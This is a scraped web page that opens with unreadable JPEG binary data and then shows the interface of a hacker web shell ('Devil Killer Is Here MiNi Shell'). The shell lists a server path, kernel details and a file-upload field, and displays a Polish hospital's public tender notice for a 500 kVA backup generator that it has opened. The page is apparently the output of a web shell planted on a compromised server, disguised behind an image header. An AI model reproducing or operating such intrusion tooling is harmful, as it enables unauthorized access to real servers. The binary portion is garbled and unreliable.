JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251014/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251014/0047464101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zapewnienie ciągłości dostaw energii elektrycznej w zakresie samowystarczalności energetycznej dla obiektów użyteczności publicznej oraz obiektów systemu zaopatrywania w wodę pitną na ... (ZP 39/25) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. Karola Jonschera Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288863</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szpitalna 27/33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-572</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@skp.ump.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.skp.ump.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie ciągłości dostaw energii elektrycznej w zakresie samowystarczalności energetycznej dla obiektów użyteczności publicznej oraz obiektów systemu zaopatrywania w wodę pitną na ... (ZP 39/25) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0c46c837-8b09-434b-8ccc-f981530389f1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00474641</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1193849 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">• Stosownie do art. 61 ust 1 ustawy pzp - w niniejszym postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem: https://platformazakupowa.pl/pn/skp_ump.<br/>• Na podstawie art. 62 ust 2 ustawa pzp - w niniejszym postępowaniu o udzielenie zamówienia komunikacja ustana między zamawiającym a wykonawcami jest dopuszczalna tylko w sprawach dotyczących instytucji wizji lokalnej w celu ustalenia terminu i oprowadzenia po miejscu realizacji (pytania o wyjaśnienia SWZ należy składać wyłącznie za pośrednictwem profilu prowadzonego postępowania, Zamawiający nie będzie odpowiadał na ewentualne pytania w czasie wizji lokalnej).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę oraz wszelkie dokumenty i oświadczenia stanowiące treść oferty lub do złożenia których wezwie Zamawiający, Wykonawca składa, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, przez osobę upoważnioną do tych czynności, za pośrednictwem https://platformazakupowa.pl/pn/skp_ump</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 39/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zapewnienie ciągłości dostaw energii elektrycznej w zakresie samowystarczalności energetycznej dla obiektów użyteczności publicznej oraz obiektów systemu zaopatrywania w wodę pitną na min. 3 dni. Agregat prądotwórczy o mocy 500,0 kVA z przeznaczeniem dla Szpitala Klinicznego im. Karola Jonschera Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu (ZP 39/25) <br/>Ilość : 1 szt.<br/>Ponadto, zakres przedmiot zamówienia obejmuję następujące świadczenia dodatkowe<br/>1) demontaż dotychczasowego posadowionego (w miejscu realizacji) agregatu Siltec P500E 500kVA/400kW, wraz z wyposażeniem;<br/>2) dostosowanie infrastruktury technicznej Zamawiającego w zakresie niezbędnym do wykonania montażu i podłączenia<br/>(Dla potrzeb realizacji umowy - przez infrastrukturę elektryczną i techniczną strony rozumieją instalacje niezbędne do podłączenia agregatu, w szczególności: instalację elektryczną, oraz inne elementy umożliwiające prawidłowe i bezpieczną pracę urządzenia);<br/>3) montaż i podłączenie dostarczonych urządzeń do infrastruktury elektrycznej i technicznej Zamawiającego;<br/>4) przeprowadzenie testów i kontroli poprawności działania zamontowanych urządzeń;<br/>5) przeszkolenie wyznaczonych osób ze strony Zamawiającego w zakresie obsługi urządzeń (min.: 5 osób) wraz z opracowaniem i przekazaniem materiałów szkoleniowych (w formie papierowej i elektronicznej) oraz udostępnieniem relacji wideo ze szkolenia<br/>6) udzielenie gwarancji na zakupione urządzenia i świadczenie usług gwarancyjnych (m. in.: przeglądy techniczne) w okresie gwarancyjnym wynoszącym 60 miesięcy z limitem 1000 mtg, zgodnie z §8 umowy;<br/>7) opracowanie i przekazanie dokumentacji (wraz z prawami autorskimi) tj.: branżowy projekt elektryczny instalacji elektrycznej dostarczonego systemu zasilania awaryjnego - agregatu oraz dokumentację techniczno-ruchową wraz ze szczegółowymi wymaganiami producenta w zakresie przeglądów, konserwacji agregatu i wymagań eksploatacyjnych;<br/>8) przeniesienie na rzecz Zamawiającego licencji lub praw autorskich do oprogramowania oraz do dokumentacji, zgodnie z §2a umowy – o ile dotyczy;<br/>6. Wykonawca ma obowiązek zagwarantować wykonanie i nadzór nad realizacją umowy przez osoby posiadające stosowne uprawnienia zawodowe . Zob. warunki udziału określone w Części V Rozdział I lit d/ Rozdział II SWZ.<br/>7. Szczegółowy opis przedmiotu zamówienia, parametry techniczne i zakres wymaganych prac zostały określone szczegółowo w:<br/>1) Opisie przedmiotu zamówienia stanowiącemu załącznik nr 1 do SWZ<br/>2) Projektowanych postanowieniach umowy stanowiący załącznik nr 12 do SWZ.<br/>Dokumenty, o których mowa powyżej są wobec siebie komplementarne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyskała najwyższa ilość punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie ubiegać się może Wykonawca, który nie wcześniej niż w okresie ostatnich 5 lat (przed upływem terminu składania ofert) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 (dwa) zadania polegające na dostawie z montażem wraz z uruchomieniem agregatów prądotwórczych w budynkach zamieszkania zbiorowego* i/lub budynkach użyteczności publicznej**, każde zadanie o wartości min.: 150 000,00 zł brutto (słownie: sto pięćdziesiąt tysięcy złotych).<br/>• *Zgodnie z §3 pkt5 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, przez budynki zamieszkania zbiorowego - należy przez to rozumieć budynek przeznaczony do okresowego pobytu ludzi, w szczególności hotel, motel, pensjonat, dom wypoczynkowy, dom wycieczkowy, schronisko młodzieżowe, schronisko, internat, dom studencki, budynek koszarowy, budynek zakwaterowania na terenie zakładu karnego, aresztu śledczego, zakładu poprawczego, schroniska dla nieletnich, a także budynek do stałego pobytu ludzi, w szczególności dom dziecka, dom rencistów i dom zakonny;<br/>• ** Zgodnie z §3 pkt6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, przez budynki użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny;<br/>• Zamawiający będzie weryfikował posiadanie wymaganego doświadczenia w oparciu o wykaz złożony zgodnie z załącznikiem nr 9 do SWZ;<br/>• Zamawiający nie uzna za spełnienie warunków udziału - przypadku wykazania realizacji więcej niż jednego zadania, ale wartości mniejszej niż 150 000,00 zł brutto dla każdej takiego zadania, które po sumowaniu dają wartość nie mniejszą niż wymaganą: 150 000,00 zł brutto. Chodzi o jedna umowę/kontrakt/zlecenia a nie sumę pojedynczych umów/kontraktów/zleceń;<br/>• „Wykonał” oznacza że wskazane zadanie zostało kompleksowo zakończone/wykonane/zrealizowane/, co musi być potwierdzone odpowiednią dokumentacją (np. referencjami );<br/>• W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje;<br/>• W przypadku warunku udziału dla wykonawców wspólnie ubiegających się o zamówienia (np. konsorcjum) w dotyczącego zdolności technicznej lub zawodowej w zakresie doświadczenia przynajmniej jeden z wykonawców wspólnie ubiegających się o zamówienia (np. członek konsorcjum lub podmiot udostępniający zasoby w postaci doświadczenia) musi samodzielnie spełniać warunek w tym zakresie tj. rzeczywiście wykonać wskazane zadania;<br/>• W przypadku podmiotu udostępniającego zasoby w celu spełnienia warunku w zakresie wymaganego doświadczenia, należy do oferty dołączyć wymagane dokumenty dot. podmiotu udostępniającego zasoby;<br/><br/>O zamówienie ubiegać się może Wykonawca który skieruję do realizacji zamówienia osoby posiadające niezbędne do wykonania zamówienia kwalifikacje i uprawnienia zawodowe niezbędne do wykonania przedmiotu zamówienia tj.:<br/>Co najmniej jedną osobę z ważnymi uprawnieniami energetycznymi* gr. I w zakresie E dla urządzeń do 1 kV (świadectwo E) - w zakresie w zakresie montażu i podłączenie dostarczonych urządzeń do infrastruktury elektrycznej i technicznej Zamawiającego<br/>* Uprawnienia energetyczne gr. I w zakresie E dla urządzeń do 1 kV - dotyczą posiadania odpowiednich kwalifikacji przez osoby skierowane przez Wykonawcę do obsługi i konserwacji urządzeń objętych przedmiotem zamówienia, określone przepisami art. 56 ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne i aktami wykonawczymi wydanymi do tej ustawy. Uprawnienia energetyczne muszą być zgodne z tzw. świadectwem kwalifikacyjnym (tj.: świadectwo G1 „E” do eksploatacji urządzeń do 1 kV) wydanym w trybie i zgodnie z § 4 ust 1 ust 2 i w zakresie określonym w § 4 ust 2 Rozporządzenie Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>2) Co najmniej jedną osobę z ważnymi uprawnieniami dozorowymi (świadectwo D) w zakresie przeprowadzenie testów i kontroli poprawności działania zamontowanych urządzeń;<br/>* Uprawnienia energetyczne w zakresie uprawnień do wykonywania pomiarów elektrycznych (świadectwo D) - dotyczą posiadania odpowiednich kwalifikacji przez osoby skierowane przez Wykonawcę do obsługi i konserwacji urządzeń objętych przedmiotem zamówienia, określone przepisami art. 56 ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne i aktami wykonawczymi wydanymi do tej ustawy. Uprawnienia energetyczne muszą być zgodne z tzw. świadectwem kwalifikacyjnym (tj.: świadectwo G1 „D” dozór – pomiary elektryczne) wydanym w trybie i zgodnie z § 4 ust 1 ust 2 i w zakresie określonym w § 4 ust 2 Rozporządzenie Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>3) Co najmniej jedną osobę posiadającą ważne uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia projektowe, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz wpis na listę członków właściwej izby samorządu zawodowego* - w zakresie opracowania branżowego projektu elektrycznego instalacji elektrycznej dostarczonego systemu zasilania awaryjnego;<br/>*uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. – Prawo budowlane oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej lub zamierzający świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa. Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. – Prawo budowlane:<br/>Przez uprawnienia budowlane rozumie się:<br/>a) prawo wykonywania samodzielnych funkcji technicznych w budownictwie, o którym mowa w Prawie budowlanym oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831), lub uzyskane przed dniem wejścia w życie ustawy - Prawo budowlane, lub<br/>b) odpowiadające im ważne uprawnienia budowlane wydane na podstawie odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r.o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334), lub<br/>c) prawo do świadczenia na terytorium Rzeczypospolitej Polskiej usługi transgranicznej, w rozumieniu przepisów ustawy cytowanej w ppkt. 2, oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551).<br/>▪ Zamawiający będzie weryfikował posiadanie wymaganych uprawnień w oparciu o wykaz osób złożony zgodnie z załącznikiem nr 10 do SWZ. Wykonawcy mogą (fakultatywnie) dołączyć do wykazu zaświadczenie z odpowiedniej izby samorządu zawodowego potwierdzające wymagane uprawnienia i wpis na listę;<br/>• Wszystkie ww. osoby skierowane do wykonania przedmiotowego zamówienia muszą mieć zapewnioną przez Wykonawcę możliwość komunikowania się z Zamawiającym w języku polskim, posiadać znajomość prawa budowlanego i procedur administracyjnych w zakresie inwestycji budowlanych realizowanych na terenie Rzeczypospolitej Polskiej;<br/>▪ Zamawiający dopuszcza łączenie stanowisk przez jedną osobę (jeżeli jest to możliwe)<br/>• W przypadku podmiotu udostępniającego zasoby w celu spełnienia warunku w zakresie wymaganego personelu, należy do oferty dołączyć wymagane dokumenty dot. podmiotu udostępniającego zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dotyczące podstaw wykluczenia:<br/>1. W zakresie art. 108 ust 1 ustawy pzp oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania określonych przez zamawiającego w dokumentacji zamówienia, o których mowa w:<br/>1) art. 108 ust. 1 pkt 3 ustawy,<br/>2) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>3) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie,<br/>4) konkurencji, art. 108 ust. 1 pkt 6 ustawy,<br/>5) art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U . poz. 835) - w zakresie podmiotów rosyjskich,<br/>Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 7 SWZ.<br/>Wykonawca, którego oferta została najwyżej oceniona, dostarczy na wezwanie Zamawiającego, w terminie nie krótszym niż 5 dni.<br/>2. W zakresie art. 108 ust 1 pkt 5 ustawy pzp Wykonawca, którego oferta została najwyżej oceniona, dostarczy na wezwanie Zamawiającego, w terminie nie krótszym niż 5 dni - OŚWIADCZENIE o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ.<br/><br/>Podmiotowe środki dowodowe dotyczące podmiotów udostępniających zasoby 1. Stosownie do § 5 ust 1 Rozporządzenia Ministra Rozwoju , Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów 